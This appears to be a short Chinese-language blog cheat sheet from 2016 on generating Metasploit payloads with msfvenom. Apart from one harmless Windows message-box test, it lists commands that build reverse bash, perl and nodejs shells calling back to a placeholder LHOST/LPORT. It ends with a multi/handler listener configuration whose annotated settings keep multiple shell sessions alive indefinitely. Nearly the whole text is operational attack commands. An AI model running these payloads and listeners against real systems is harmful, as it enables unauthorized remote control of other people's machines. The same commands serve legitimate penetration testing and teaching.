msfvenom -a x86 -p windows/messagebox Title="ssooking" TEXT="hello, it is a test" -f exe -o hello.exe msfvenom -p windows/messagebox Title="ssooking" TEXT="hello, it is a test" -f exe -o hello.exe #64位
msfvenom -p cmd/unix/reverse_bash LHOST=xxx LPORT=xxx -f raw -o shell.sh
perl
1
msfvenom -p cmd/unix/reverse_perl LHOST=xxx LPORT=xxx -f raw -o shell.pl
nodejs
1
msfvenom -p nodejs/shell_reverse_tcp LHOST=xxx LPORT=xxx -f raw -o shell.js
MSF监听
1 2 3 4 5 6 7 8
use exploit/multi/handler set PAYLOAD <Payload name> set RHOST <RHOST value> set RPORT <RPORT value> set LHOST <LHOST value> set LPORT <LPORT value> set ExitOnSession false exploit -j -z
set exitonsession false //可以让建立监听的端口继续保持侦听,可以接受多个session set stagerverifysslcert false //防止获取shell的时候出现的SSL_accept错误 set SessionCommunicationTimeout 0 //防止会话在长时间(默认存活300秒,5分钟)无操作时被杀死 set SessionExpirationTimeout 0 //防止会话将被强制关闭(默认保留604800秒,一周)
Post title:msfvenom生成payload
Post author:ssooking
Create time:2016-11-15 17:22:00
Post link:https://ssooking.github.io/2016/11/msfvenom生成payload/
Copyright Notice:All articles in this blog are licensed under BY-NC-SA unless stating additionally.